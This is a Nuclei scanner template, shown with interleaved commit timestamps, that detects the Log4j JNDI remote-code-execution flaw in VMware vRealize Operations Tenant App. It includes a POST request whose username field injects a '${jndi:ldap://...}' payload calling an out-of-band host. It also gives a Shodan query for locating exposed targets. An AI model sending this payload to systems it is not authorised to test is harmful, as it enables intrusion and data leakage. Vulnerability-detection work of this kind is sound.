2022-03-07 10:16:57 +00:00
id : vrealize-operations-log4j-rce
2022-03-07 09:43:20 +00:00
info :
2022-04-07 13:53:15 +00:00
name : VMware vRealize Operations Tenant App Log4j JNDI Remote Code Execution
2022-03-07 09:43:20 +00:00
author : bughuntersurya
severity : critical
2022-07-16 17:05:27 +00:00
description : |
VMware vRealize Operations is susceptible to a critical vulnerability in Apache Log4j which may allow remote code execution in an impacted vRealize Operations Tenant application.
2022-03-22 03:48:47 +00:00
reference :
- https://www.vmware.com/security/advisories/VMSA-2021-0028.html
- https://core.vmware.com/vmsa-2021-0028-questions-answers-faq
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- https://nvd.nist.gov/vuln/detail/CVE-2021-45046
2022-07-16 17:05:27 +00:00
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
2022-03-22 03:48:47 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
metadata :
2022-07-18 06:34:22 +00:00
verified : true
2022-04-22 10:38:41 +00:00
shodan-query : http.title:"vRealize Operations Tenant App"
2022-07-16 17:05:27 +00:00
tags : cve,cve2021,oast,rce,log4j,vmware,vrealize
2022-03-07 09:43:20 +00:00
requests :
- raw :
- |
POST /suite-api/api/auth/token/acquire HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
Origin : {{RootURL}}
Referer : {{RootURL}}/ui/
{"username" : "${jndi:ldap://${hostName}.{{interactsh-url}}}" , "password" : "admin" }
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol
words :
- "dns" # Confirms the DNS Interaction
- type : regex
part : interactsh_request
regex :
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors :
- type : regex
part : interactsh_request
group : 1
regex :
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
2022-03-22 03:48:47 +00:00
2022-04-07 13:53:15 +00:00
# Enhanced by mp on 2022/04/05